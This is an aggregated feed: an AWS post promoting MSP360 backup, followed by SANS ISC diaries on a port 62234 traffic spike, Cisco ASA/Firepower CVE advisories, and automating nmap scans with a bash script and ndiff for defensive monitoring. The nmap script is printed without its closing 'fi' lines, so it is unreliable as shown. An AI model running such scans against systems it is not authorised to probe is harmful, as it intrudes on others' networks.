We launched the AWS Partner Network (APN) in 2012. MSP360 was one of the first to join. Today, as an APN Advanced Technology Partner with Storage Competency for the Backup & Restore use case and one of our top storage partners, MSP360 gives its customers access to multiple Amazon Simple Storage Service (S3) storage options and classes, and also supports Snowball Edge. They are planning to support AWS Outposts and are also working on a billing model that will simplify the billing experience for MSP360 customers that use Amazon S3.

Here I am with the MSP360 team and some of my AWS colleagues at re:Invent 2019:


Inside MSP360 (CloudBerry) Managed Backup Service
CloudBerry Explorer started out as a file transfer scheduler that ran only on Windows. It is now known as MSP360 (CloudBerry) Managed Backup Service (MBS) and provides centralized job management, monitoring, reporting, and licensing control. MBS supports file-based and image-level backup, and also includes specialized support for applications like SQL Server and Microsoft Exchange. Agentless, host-level backup support is available for VMware and Hyper-V. Customers can also backup Microsoft Office 365 and Google G Suite documents, data, and configurations.

By the Numbers
The product suite is available via a monthly subscription model that is a great fit for the MSPs and for their customers. As reported in a recent story, this model has allowed them to grow their revenue by 60% in 2019, driven by a 40% increase in product activations. Their customer base now includes over 9,000 MSPs and over 100,000 end-user customers. Working together with their MSP, customers can choose to store their data in any commercial AWS region, including the two regions in China.

Special Offer
The MSP360 team has created a special offer that is designed to help new customers to get started at no charge. The offer includes $200 in MBS licenses and customers can make use of up to 2 terabytes of S3 storage. Customers also get access to the MSP360 Remote Desktop product and other features. To take advantage of this offer, visit the MSP360 Special Offer page.




What is up on Port 62234?, (Tue, May 19th)

This post was originally published on this site

Here at the ISC we provide access to a number of bits of data which can be used to dig into problems or even as an early warning system of unusual activity.  Well today’s data has revealed a confounding one.  Port 62234, which traditionally has zero on near zero sources attempting to access it suddenly has hundreds of sources.

This port is not one I have seen as a target before, and none of my sources show any traffic on this port. A check of Shodan shows only 3 hits, and two of those appear to be BitTorrent related.  I am at a loss.  If any of you has further information,  firewall logs, or better yet, packet captures of this activity it would be appreciated if you could send it over for analysis.

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Cisco Advisories for FTD, ASA, Firepower 1000, (Tue, May 19th)

This post was originally published on this site

Cisco has released a number of advisories for Firepower and Adaptive Security Appliance (ASA). 

Cisco Adaptive Security Appliance Software
CVE-2020-3259Web Services Information Disclosure Vulnerability – High 
–    An unauthenticated, remote, attacker can access memory and potentially confidential information.
CVE-2020-3298Malformed OSPF Packets Denial of Service Vulnerability – High
–    An unauthenticated, remote, attacker could cause a device to reload resulting in DOS
CVE-2020-3196SSL/TLS Denial of Service Vulnerability – High
–    Unauthenticated, remote attacker can exhaust memory resources leading to DOS
CVE-2020-3195OSPF Packet Processing Memory Leak Vulnerability – High
–    Unauthenticated, remote attacker can exhaust memory resources resulting in DOS

Firepower Threat Defense
CVE-2020-3259Web Services Information Disclosure Vulnerability – High 
–    An unauthenticated, remote attacker can access memory and potentially confidential information.
CVE-2020-3298Malformed OSPF Packets Denial of Service Vulnerability – High
–    An unauthenticated, remote, attacker could cause a device to reload resulting in DOS
CVE-2020-3255Packet Flood Denial of Service Vulnerability – High
–    An unauthenticated, remote attacker can cause a DOS on the device.
CVE-2020-3189VPN System Logging Denial of Service Vulnerability – High
–    Unauthenticated, remote attacker can cause memory leak resulting in device degradation or crash.
CVE-2020-3196SSL/TLS Denial of Service Vulnerability – High
–    Unauthenticated, remote attacker can exhaust memory resources leading to DOS
CVE-2020-3195OSPF Packet Processing Memory Leak Vulnerability – High
–    Unauthenticated, remote attacker can exhaust memory resources resulting in DOS

Firepower 1000
CVE-2020-3283SSL/TLS Denial of Service Vulnerability – High
–    Unauthenticated, remote attacker can cause buffer underrun resulting in DOS.

Althought Cisco rated all of these vulnerabilities the same, high, most of them require a patient, determined attacker and will result in a DOS condition.  The exception to this is CVE-2020-3259 which can result in a breach of sensitive information. Either way the solution is to upgrade to an unaffected version of the software.


— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Automating nmap scans, (Mon, May 18th)

This post was originally published on this site

With last week’s diary  I left you with using a relatively basic nmap command to perform a relatively thorough scan of an IP range.  That command was:

nmap -sT -A <scan_target>

I had indicated that I often use variations on that command to automate periodic scans against a critical IP range.  I had left you with some basics about what other parts of nmap can be helpful to automate this.  This week I received some questions about the automation steps, so here is the rest of the details.  In practice, most of my automated scripts have evolved from this simple state, but in its very basic form here is where they evolved from.  

In order to truly automate the scan we need three components:
Input file – to tell nmap which targets to scan
Output file(s) – to record and compare the results
Bash script – to act as a wrapper for the process steps

To tell nmap which IPs or networks to scan you can use the -iL <filename> parameter.  For a quick scan I usually just create a file called ips.txt in the current directory.  The contents of that file can be single IPs or network ranges in CIDR format, one address/network per line. So that takes us to an nmap command of:

nmap -sT -A -iL <address_file>

As stated in the previous diary, the -oA <filename> parameter will send the nmap scan results to files utilizing all three of nmap’s output formats; normal (.nmap), XML (.xml), and grepable (.gnmap).  Only the .xml version is used by ndiff, but I find the other output formats useful for other purposes such as investigating after the scan.  Typically I just send my output to a file called nmap_current.  So the resulting nmap command is:

nmap -sT -A -iL <address_file> -oA nmap_current

and once that command is complete there will be three nmap output files:

There are many ways the running of this can be automated, but typically I just create a simple bash shell script and schedule it with cron to run at the appropriate interval.  A sample Bash script, nmap_scan.sh:


# if there is a current file from a past run, then copy it to previous
if [ -f nmap_current.xml ];then
   cp nmap_current.xml nmap_previous.xml

# run nmap
/usr/bin/nmap -sT -A -iL ips.txt -oA nmap_current

# if there is not a previous file then there is no point running ndiff
# this will fix itself on the next run
if [ -f nmap_previous.xml ];then
   /bin/ndiff nmap_previous.xml nmap_current.xml >> ndiff_out.txt

Please note that is not a very robust script.  The paths should be more explicit, and  it does not handle the emailing of the ndiff result, but as a quick and dirty script it will do.
Once the script completes you will find the differences between the current scan and the previous scan in ndiff_out.txt in standard diff formal.  i.e. anything from the original file that has been removed shows a minus sign in the first column and anything in the new file that has been added shows with a plus sign in the first column.

# cat ndiff_out.txt
-Nmap 7.60 scan initiated Mon May 18 19:36:21 2020 as: /usr/bin/nmap -sT -A -iL ips.txt -oA nmap_current
+Nmap 7.60 scan initiated Mon May 18 20:12:00 2020 as: /usr/bin/nmap -sT -A -iL ips.txt -oA nmap_current

OS details:
 Vodavi XTS-IP PBX
- Android 5.0 - 5.1
- Linux 3.2 - 3.10
 Linux 3.2 - 3.16
 Linux 3.2 - 4.8
+ Linux 3.2 - 3.10
 Linux 4.2
+ Android 5.0 - 5.1
+ Linux 2.6.32
 Linux 3.10
 Linux 3.13
- Linux 2.6.32
 Linux 2.6.32 - 3.10

+Host is up.
+Not shown: 999 closed ports
+3306/tcp open mysql  MariaDB (unauthorized)
+OS details:
+ Linux 2.6.32
+ Linux 3.7 - 3.10
+ Linux 3.10
+ Linux 3.16
+ Linux 3.8 - 4.9
+ Linux 3.1
+ Linux 3.2
+ AXIS 210A or 211 Network Camera (Linux 2.6.17)
+ Linux 3.11 - 3.14
+ Linux 3.19

A little knowledge of the network and some analysis and this is enough to give you a warning if something unusual is going on. i.e. an unauthorized device, or service has appeared, or the configuration of one of the devices has changed. 

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.